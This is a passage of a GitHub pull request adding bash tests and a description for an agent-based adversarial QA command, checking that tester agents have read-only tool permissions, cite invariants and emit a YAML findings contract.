+  testers-monitor-devils-advocate
+)
+
+pass() { printf 'PASS  %s\n' "$1"; }
+fail() { printf 'FAIL  %s\n' "$1" >&2; exit 1; }
+
+# C1: invariants.yaml exists and has 10 invariants
+[ -f "$INVARIANTS" ] || fail "C1: invariants.yaml missing at $INVARIANTS"
+N="$(python3 -c "import yaml; print(len(yaml.safe_load(open('$INVARIANTS'))['invariants']))")"
+[ "$N" = "10" ] || fail "C1: expected 10 invariants, got $N"
+pass "C1: invariants.yaml has 10 entries"
+
+# C2: skill SKILL.md exists and declares schema_version
+[ -f "$SKILL_DIR/SKILL.md" ] || fail "C2: SKILL.md missing"
+grep -q "schema_version: 1" "$SKILL_DIR/SKILL.md" || fail "C2: SKILL.md lacks schema_version: 1"
+pass "C2: SKILL.md present and declares schema_version: 1"
+
+# C3: command file exists and invokes testers-pipeline
+[ -f "plugins/uberdev/commands/testers.md" ] || fail "C3: command file missing"
+grep -q "uberdev:testers-pipeline" "plugins/uberdev/commands/testers.md" || fail "C3: command does not invoke uberdev:testers-pipeline"
+pass "C3: command file invokes testers-pipeline"
+
+# C4: each expected agent file exists with canonical frontmatter
+for a in "${EXPECTED_AGENTS[@]}"; do
+  F="$AGENT_DIR/$a.md"
+  [ -f "$F" ] || fail "C4: $a missing"
+  grep -q "^name: $a$" "$F" || fail "C4 $a: name line wrong"
+  grep -q "^model: " "$F" || fail "C4 $a: model line missing"
+  grep -q "^color: " "$F" || fail "C4 $a: color line missing"
+done
+pass "C4: all 8 agent files exist with canonical frontmatter"
+
+# C5: no agent has Edit or bare Write in allowed-tools (read-only contract)
+for a in "${EXPECTED_AGENTS[@]}"; do
+  F="$AGENT_DIR/$a.md"
+  # allowed-tools may be a list or a YAML flow array; check both shapes
+  if grep -E "^allowed-tools:.*\\bEdit\\b" "$F" > /dev/null; then
+    fail "C5 $a: forbidden 'Edit' in allowed-tools"
+  fi
+  if grep -E "^allowed-tools:.*\\bWrite\\b(?!\\()" "$F" > /dev/null 2>&1; then
+    # bare Write is forbidden; Write(<scope>) is OK
+    if ! grep -E "Write\\(" "$F" > /dev/null; then
+      fail "C5 $a: bare 'Write' in allowed-tools (must be scoped Write(<dir>))"
+    fi
+  fi
+done
+pass "C5: no agent has unrestricted Edit / Write"
+
+# C6: each persona references at least one invariant ID from invariants.yaml
+INV_IDS="$(python3 -c "import yaml; [print(i['id']) for i in yaml.safe_load(open('$INVARIANTS'))['invariants']]")"
+PERSONA_AGENTS=( testers-panicked-grandma testers-power-user testers-adversarial-security testers-chaos-engineer testers-a11y-critic testers-mobile-thumb )
+for a in "${PERSONA_AGENTS[@]}"; do
+  F="$AGENT_DIR/$a.md"
+  FOUND=0
+  while IFS= read -r id; do
+    if grep -qE "\\b$id\\b" "$F"; then FOUND=1; break; fi
+  done <<< "$INV_IDS"
+  [ "$FOUND" = "1" ] || fail "C6 $a: references no invariant from invariants.yaml"
+done
+pass "C6: every persona references at least one invariant"
+
+# C7: each agent emits the reviewer YAML contract markers
+for a in "${EXPECTED_AGENTS[@]}"; do
+  F="$AGENT_DIR/$a.md"
+  grep -q "verdict:" "$F" || fail "C7 $a: missing 'verdict:' in output contract"
+  grep -q "findings:" "$F" || fail "C7 $a: missing 'findings:' in output contract"
+  grep -q "confidence:" "$F" || fail "C7 $a: missing 'confidence:' in output contract"
+done
+pass "C7: all agents declare verdict / findings / confidence in their output contract"
+
+echo "ALL TESTS PASS"

--- a/tests/testers-agent-contract.test.sh
+++ b/tests/testers-agent-contract.test.sh
@@ -60,19 +60,34 @@ for a in "${EXPECTED_AGENTS[@]}"; do
 done
 pass "C4: all 8 agent files exist with canonical frontmatter"
 
-# C5: no agent has Edit or bare Write in allowed-tools (read-only contract)
+# C5: no agent has Edit or bare Write in allowed-tools (read-only contract).
+# Bare `Write` is forbidden; `Write(<scope>)` is OK. POSIX ERE has no
+# lookarounds, so we detect bare Write via a 3-line python YAML parser
+# (load the frontmatter, scan allowed-tools tokens). Python YAML is already
+# a hard dep of this repo (aggregate.py + report.py); cost is one extra
+# subprocess per agent file.
 for a in "${EXPECTED_AGENTS[@]}"; do
   F="$AGENT_DIR/$a.md"
-  # allowed-tools may be a list or a YAML flow array; check both shapes
   if grep -E "^allowed-tools:.*\\bEdit\\b" "$F" > /dev/null; then
     fail "C5 $a: forbidden 'Edit' in allowed-tools"
   fi
-  if grep -E "^allowed-tools:.*\\bWrite\\b(?!\\()" "$F" > /dev/null 2>&1; then
-    # bare Write is forbidden; Write(<scope>) is OK
-    if ! grep -E "Write\\(" "$F" > /dev/null; then
-      fail "C5 $a: bare 'Write' in allowed-tools (must be scoped Write(<dir>))"
-    fi
-  fi
+  python3 - "$F" "$a" <<'PY' || exit $?
+import sys, re
+path, agent = sys.argv[1], sys.argv[2]
+with open(path) as fh:
+    text = fh.read()
+# Extract allowed-tools line(s) from frontmatter — accept YAML list or flow array.
+# We don't need a full YAML parser; the contract is "no bare Write token", so
+# tokenize on commas / brackets and check each entry literally.
+m = re.search(r'(?m)^allowed-tools:\s*(.+)$', text)
+if not m:
+    sys.exit(0)  # no allowed-tools line → nothing forbidden
+tokens = re.findall(r'[A-Za-z_]+(?:\([^)]*\))?', m.group(1))
+for tok in tokens:
+    if tok == 'Write':
+        print(f"FAIL  C5 {agent}: bare 'Write' in allowed-tools (must be scoped Write(<dir>))", file=sys.stderr)
+        sys.exit(1)
+PY
 done
 pass "C5: no agent has unrestricted Edit / Write"
 

--- a/tests/testers-pipeline.test.sh
+++ b/tests/testers-pipeline.test.sh
@@ -1,0 +1,61 @@
+#!/usr/bin/env bash
+# tests/testers-pipeline.test.sh
+#
+# Integration test for the /uberdev:testers aggregate step.
+# Uses canned per-agent YAML outputs (tests/fixtures/testers-mock-outputs/)
+# to exercise plugins/uberdev/skills/testers-pipeline/aggregate.py
+# deterministically.
+
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
+cd "$REPO_ROOT"
+
+SCRATCH="$(mktemp -d -t testers-pipeline-XXXX)"
+trap "rm -rf $SCRATCH" EXIT
+
+AGG="plugins/uberdev/skills/testers-pipeline/aggregate.py"
+INV="plugins/uberdev/skills/testers-pipeline/invariants.yaml"
+FIX="tests/fixtures/testers-mock-outputs"
+
+# Mirror the fixtures into the agent-scoped scratch layout
+mkdir -p "$SCRATCH/scratch/panicked-grandma" \
+         "$SCRATCH/scratch/power-user" \
+         "$SCRATCH/scratch/adversarial-security" \
+         "$SCRATCH/scratch/chaos-engineer" \
+         "$SCRATCH/scratch/a11y-critic"
+cp "$FIX/wave-1-grandma.yaml"      "$SCRATCH/scratch/panicked-grandma/out.yaml"
+cp "$FIX/wave-1-power-user.yaml"   "$SCRATCH/scratch/power-user/out.yaml"
+cp "$FIX/wave-1-security.yaml"     "$SCRATCH/scratch/adversarial-security/out.yaml"
+cp "$FIX/wave-1-no-evidence.yaml"  "$SCRATCH/scratch/chaos-engineer/out.yaml"
+cp "$FIX/wave-1-no-invariant.yaml" "$SCRATCH/scratch/a11y-critic/out.yaml"
+
+# Run aggregator
+python3 "$AGG" \
+  --run-id smoke \
+  --wave 1 \
+  --scratch-dir "$SCRATCH/scratch" \
+  --invariants "$INV" \
+  --out "$SCRATCH/wave-1.yaml"
+
+# P1: file exists and parses
+python3 -c "import yaml; yaml.safe_load(open('$SCRATCH/wave-1.yaml'))" || { echo "P1: malformed YAML"; exit 1; }
+echo "PASS P1: wave-1.yaml is well-formed"
+
+# P2: exactly 3 findings (5 inputs, 2 dropped — no-evidence and no-invariant)
+COUNT="$(python3 -c "import yaml; print(len(yaml.safe_load(open('$SCRATCH/wave-1.yaml'))['findings']))")"
+[ "$COUNT" = "3" ] || { echo "P2: expected 3 findings, got $COUNT"; exit 1; }
+echo "PASS P2: aggregator kept 3 valid findings + dropped 2 invalid ones"
+
+# P3: the blocker auth_isolation finding is present
+HAS_BLOCKER="$(python3 -c "import yaml; ff=yaml.safe_load(open('$SCRATCH/wave-1.yaml'))['findings']; print(any(f['severity']=='blocker' and f['invariant_violated']=='auth_isolation' for f in ff))")"
+[ "$HAS_BLOCKER" = "True" ] || { echo "P3: missing blocker auth_isolation finding"; exit 1; }
+echo "PASS P3: blocker auth_isolation finding preserved"
+
+# P4: stable IDs are deterministic — re-run and compare hashes
+python3 "$AGG" --run-id smoke --wave 1 --scratch-dir "$SCRATCH/scratch" --invariants "$INV" --out "$SCRATCH/wave-1b.yaml"
+DIFF="$(python3 -c "import yaml; a=yaml.safe_load(open('$SCRATCH/wave-1.yaml'))['findings']; b=yaml.safe_load(open('$SCRATCH/wave-1b.yaml'))['findings']; print(set(f['id'] for f in a) == set(f['id'] for f in b))")"
+[ "$DIFF" = "True" ] || { echo "P4: stable-id determinism broken"; exit 1; }
+echo "PASS P4: finding IDs are deterministic"
+
+echo "ALL TESTS PASS"


### PR DESCRIPTION
## Summary

- Adds `/uberdev:testers` (alias `/testers`) — a read-only adversarial QA audit squad of 6 distinct-persona testers + 2 monitor agents that runs 3 coordinated waves against an auto-detected web / api / native / all target.
- Findings are evidence-anchored against a 10-invariant oracle library (`invariants.yaml`); blocker/critical/major findings are filed as GitHub issues via the existing `findings-to-issues` pipeline with HTML-comment fingerprint dedupe and MAX_NEW=10 cap.
- **Read-only by construction**: every agent has a per-file `allowed-tools` whitelist that excludes `Edit` and bare `Write` — only scoped `Write(.uberdev/research/*)` plus its toolkit MCP. Enforced at the tool boundary.

## Design

- Spec: `docs/uberdev/specs/2026-05-21-testers-command-design.md` (local-only per gitignore convention)
- Plan: `docs/uberdev/plans/2026-05-21-testers-command.md` (local-only)
- RFC: `docs/rfc/0006-testers-command.md`

## Squad roster (8 agents per wave × 3 waves = 24 agent dispatches per run)

| Role | File | Model | Prior |
|---|---|---|---|
| Persona | `testers-panicked-grandma` | sonnet | slow reads, mis-clicks, abandons |
| Persona | `testers-power-user` | sonnet | 10k-char paste, tab-spam, double-click |
| Persona | `testers-adversarial-security` | sonnet | XSS/SQLi/SSTI, unicode tricks, IDOR |
| Persona | `testers-chaos-engineer` | sonnet | Slow 3G / Offline / CPU 4x / drops |
| Persona | `testers-a11y-critic` | sonnet | keyboard-only, screen-reader, contrast |
| Persona | `testers-mobile-thumb` | sonnet | 375px touch, orientation, safe-area |
| Monitor | `testers-monitor-primary` | opus | cross-refs, follow-ups, verified-gate |
| Monitor | `testers-monitor-devils-advocate` | sonnet | Snorkel self-critique-paradox countermeasure (separate prompt + tier) |

## Wiring

- `commands/testers.md` → `Skill(uberdev:testers-pipeline)` inline (same idiom as `/dev`, `/turbo`).
- Skill owns Phase 0 (parse + auto-detect target), Phase 1 (dispatch master via `lib/dispatch.sh` — claude-bg/wezterm/background per RFC 0004; `--watch` runs inline), Phase 2–4 (three waves of 8-agent parallel `Task()` fan-out), Phase 5 (`report.md` + findings-to-issues aggregate via `report.py`), Phase 6 (summary).
- Aggregation: `aggregate.py` drops findings without `invariant_violated` + an evidence anchor — defeats hallucinated-bug failure mode.

## Test Plan

- [x] `tests/aliases.test.sh` — 72 passed / 0 failed (includes `/testers` in canonical list per T21)
- [x] `tests/testers-agent-contract.test.sh` — C1–C7 all pass (frontmatter, read-only `allowed-tools`, invariant references, reviewer YAML contract)
- [x] `tests/testers-pipeline.test.sh` — P1–P4 all pass (well-formed YAML, drops 2 invalid of 5 inputs, blocker preserved, stable-id deterministic)
- [ ] Manual e2e against `tests/fixtures/buggy-app/` (Express server with 6 seeded bugs B1–B6) — `cd tests/fixtures/buggy-app && npm install && npm start` then `/uberdev:testers http://localhost:3457 --watch` and assert ≥5 of 6 seeded bugs surface in `report.md`.

## Touch surface

- **New (15):** `commands/testers.md`, `skills/testers-pipeline/{SKILL.md,invariants.yaml,aggregate.py,report.py}`, 8 × `agents/testers-*.md`, `docs/rfc/0006-testers-command.md`, `tests/testers-{agent-contract,pipeline}.test.sh`, `tests/fixtures/testers-mock-outputs/*`, `tests/fixtures/buggy-app/*`.
- **Modified (6):** `lib/aliases-sync.sh`, `commands/install-aliases.md`, `commands/uninstall-aliases.md`, `README.md`, `tests/aliases.test.sh`, `CHANGELOG.md`.

## Reuses without modification

- `lib/dispatch.sh` (RFC 0004) — master backgrounding
- `agents/findings-to-issues.md` — durable persistence (fingerprint dedupe + MAX_NEW=10)
- Reviewer YAML contract — `verdict / findings / confidence`
- `.uberdev/research/$RUN_ID/` artifact convention

## Defenses against documented LLM-tester failure modes (7)

| Failure mode | Defense |
|---|---|
| Optimistic-pass | `verified: true` gate requires ≥2 persona repros via `monitor-primary` cross_refs |
| Hallucinated bugs | `evidence` + `invariant_violated` required; `aggregate.py` drops unanchored findings |
| Silent failure / spec drift | Personas reference invariant IDs from `invariants.yaml`; unknown IDs → drop |
| Cascading hallucination | Monitors run in clean context per wave with prior findings as read input only |
| Loop traps | `max_actions: 200` + `max_clock_seconds: 300` per persona-wave; monitor-primary flags 3× same-action |
| Sycophantic confirmation | `monitor-devils-advocate` uses separate prompt + sonnet (vs primary's opus) — Snorkel 2026 countermeasure |
| Shared-session pollution | Each persona gets a scoped scratch dir; fresh subagent per wave |


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

## Release Notes

* **New Features**
  * Introduced `/uberdev:testers` command (aliased as `/testers`), a read-only adversarial QA audit feature with automated persona-based testing across 3 coordinated waves, auto-detection of target surface type (web/api/native), and automatic GitHub issue filing for verified findings.

* **Documentation**
  * Added comprehensive documentation and specifications for the new audit capability.

<!-- review_stack_entry_start -->

[![Review Change Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/TheFJK/UberDev/pull/130?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->